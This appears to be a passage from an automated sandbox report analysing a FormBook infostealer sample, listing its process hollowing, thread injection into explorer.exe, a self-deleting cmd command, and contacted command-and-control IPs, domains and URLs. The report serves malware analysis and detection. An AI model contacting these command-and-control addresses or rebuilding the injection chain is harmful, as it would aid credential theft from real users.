Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1C06 mov eax, dword ptr fs:[00000030h] 17_2_00EC1C06
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h] 17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1D5E0 mov eax, dword ptr fs:[00000030h] 17_2_00E1D5E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECFDE2 mov eax, dword ptr fs:[00000030h] 17_2_00ECFDE2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EB8DF1 mov eax, dword ptr fs:[00000030h] 17_2_00EB8DF1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov ecx, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E86DC9 mov eax, dword ptr fs:[00000030h] 17_2_00E86DC9
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h] 17_2_00ED05AC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED05AC mov eax, dword ptr fs:[00000030h] 17_2_00ED05AC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E335A1 mov eax, dword ptr fs:[00000030h] 17_2_00E335A1
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h] 17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h] 17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E31DB5 mov eax, dword ptr fs:[00000030h] 17_2_00E31DB5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E32581 mov eax, dword ptr fs:[00000030h] 17_2_00E32581
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E02D8A mov eax, dword ptr fs:[00000030h] 17_2_00E02D8A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h] 17_2_00E3FD9B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3FD9B mov eax, dword ptr fs:[00000030h] 17_2_00E3FD9B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h] 17_2_00E2C577
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2C577 mov eax, dword ptr fs:[00000030h] 17_2_00E2C577
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E43D43 mov eax, dword ptr fs:[00000030h] 17_2_00E43D43
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E83540 mov eax, dword ptr fs:[00000030h] 17_2_00E83540
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EB3D40 mov eax, dword ptr fs:[00000030h] 17_2_00EB3D40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E27D50 mov eax, dword ptr fs:[00000030h] 17_2_00E27D50
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0AD30 mov eax, dword ptr fs:[00000030h] 17_2_00E0AD30
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E13D34 mov eax, dword ptr fs:[00000030h] 17_2_00E13D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECE539 mov eax, dword ptr fs:[00000030h] 17_2_00ECE539
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h] 17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h] 17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E34D3B mov eax, dword ptr fs:[00000030h] 17_2_00E34D3B
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8D34 mov eax, dword ptr fs:[00000030h] 17_2_00ED8D34
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E8A537 mov eax, dword ptr fs:[00000030h] 17_2_00E8A537
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E316E0 mov ecx, dword ptr fs:[00000030h] 17_2_00E316E0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E176E2 mov eax, dword ptr fs:[00000030h] 17_2_00E176E2
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E48EC7 mov eax, dword ptr fs:[00000030h] 17_2_00E48EC7
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBFEC0 mov eax, dword ptr fs:[00000030h] 17_2_00EBFEC0
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E336CC mov eax, dword ptr fs:[00000030h] 17_2_00E336CC
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8ED6 mov eax, dword ptr fs:[00000030h] 17_2_00ED8ED6
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED0EA5 mov eax, dword ptr fs:[00000030h] 17_2_00ED0EA5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E846A7 mov eax, dword ptr fs:[00000030h] 17_2_00E846A7
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9FE87 mov eax, dword ptr fs:[00000030h] 17_2_00E9FE87
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1766D mov eax, dword ptr fs:[00000030h] 17_2_00E1766D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h] 17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h] 17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h] 17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h] 17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2AE73 mov eax, dword ptr fs:[00000030h] 17_2_00E2AE73
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E17E41 mov eax, dword ptr fs:[00000030h] 17_2_00E17E41
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h] 17_2_00ECAE44
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ECAE44 mov eax, dword ptr fs:[00000030h] 17_2_00ECAE44
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0E620 mov eax, dword ptr fs:[00000030h] 17_2_00E0E620
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EBFE3F mov eax, dword ptr fs:[00000030h] 17_2_00EBFE3F
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h] 17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h] 17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E0C600 mov eax, dword ptr fs:[00000030h] 17_2_00E0C600
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E38E00 mov eax, dword ptr fs:[00000030h] 17_2_00E38E00
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00EC1608 mov eax, dword ptr fs:[00000030h] 17_2_00EC1608
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h] 17_2_00E3A61C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A61C mov eax, dword ptr fs:[00000030h] 17_2_00E3A61C
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E437F5 mov eax, dword ptr fs:[00000030h] 17_2_00E437F5
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E18794 mov eax, dword ptr fs:[00000030h] 17_2_00E18794
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h] 17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h] 17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E87794 mov eax, dword ptr fs:[00000030h] 17_2_00E87794
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1FF60 mov eax, dword ptr fs:[00000030h] 17_2_00E1FF60
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED8F6A mov eax, dword ptr fs:[00000030h] 17_2_00ED8F6A
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E1EF40 mov eax, dword ptr fs:[00000030h] 17_2_00E1EF40
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h] 17_2_00E04F2E
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E04F2E mov eax, dword ptr fs:[00000030h] 17_2_00E04F2E
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3E730 mov eax, dword ptr fs:[00000030h] 17_2_00E3E730
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h] 17_2_00ED070D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00ED070D mov eax, dword ptr fs:[00000030h] 17_2_00ED070D
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h] 17_2_00E3A70E
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E3A70E mov eax, dword ptr fs:[00000030h] 17_2_00E3A70E
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E2F716 mov eax, dword ptr fs:[00000030h] 17_2_00E2F716
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h] 17_2_00E9FF10
Source: C:\Users\user\Desktop\kayx.exe Code function: 17_2_00E9FF10 mov eax, dword ptr fs:[00000030h] 17_2_00E9FF10
Enables debug privileges
Source: C:\Users\user\Desktop\kayx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 184.168.131.241 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.185.159.141 80 Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\kayx.exe Memory written: C:\Users\user\Desktop\kayx.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\kayx.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Section loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\kayx.exe Thread register set: target process: 3388 Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Thread register set: target process: 3388 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\kayx.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\kayx.exe Section unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 3F0000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe' Jump to behavior
Source: explorer.exe, 00000012.00000002.482884776.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000012.00000002.483795240.0000000001980000.00000002.00000001.sdmp, firefoxe.exe, 00000013.00000002.483674375.0000000001720000.00000002.00000001.sdmp, firefoxe.exe, 00000014.00000002.483346548.0000000001140000.00000002.00000001.sdmp, mstsc.exe, 00000015.00000002.485726681.0000000003440000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\kayx.exe Queries volume information: C:\Users\user\Desktop\kayx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe Code function: 1_2_05C4C920 GetUserNameA, 1_2_05C4C920
Source: C:\Users\user\Desktop\kayx.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 321226 Sample: kayx.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 43 www.amtpsychology.com 2->43 51 Malicious sample detected (through community Yara rule) 2->51 53 Antivirus detection for dropped file 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 6 other signatures 2->57 11 kayx.exe 1 4 2->11         started        signatures3 process4 file5 37 C:\Users\user\AppData\...\firefoxe.exe, PE32 11->37 dropped 39 C:\Users\...\firefoxe.exe:Zone.Identifier, ASCII 11->39 dropped 41 C:\Users\user\AppData\Local\...\kayx.exe.log, ASCII 11->41 dropped 67 Detected unpacking (changes PE section rights) 11->67 69 Tries to detect virtualization through RDTSC time measurements 11->69 71 Injects a PE file into a foreign processes 11->71 15 kayx.exe 11->15         started        18 kayx.exe 11->18         started        20 kayx.exe 11->20         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 Queues an APC in another process (thread injection) 15->79 22 explorer.exe 2 15->22 injected process9 dnsIp10 45 jibenentreprenad.mobi 184.168.131.241, 49744, 80 AS-26496-GO-DADDY-COM-LLCUS United States 22->45 47 www.jibenentreprenad.mobi 22->47 49 2 other IPs or domains 22->49 59 System process connects to network (likely due to code injection or exploit) 22->59 26 mstsc.exe 22->26         started        29 firefoxe.exe 22->29         started        31 firefoxe.exe 22->31         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 26->61 63 Maps a DLL or memory area into another process 26->63 65 Tries to detect virtualization through RDTSC time measurements 26->65 33 cmd.exe 1 26->33         started        process14 process15 35 conhost.exe 33->35         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
184.168.131.241
unknown United States
26496 AS-26496-GO-DADDY-COM-LLCUS true
198.185.159.141
unknown United States
53831 SQUARESPACEUS false

Contacted Domains

Name IP Active
jibenentreprenad.mobi 184.168.131.241 true
ext-sq.squarespace.com 198.185.159.141 true
www.jibenentreprenad.mobi unknown unknown
www.ghoster.agency unknown unknown
www.amtpsychology.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.jibenentreprenad.mobi/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX true
  • Avira URL Cloud: safe
unknown
http://www.ghoster.agency/bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX true
  • Avira URL Cloud: safe
unknown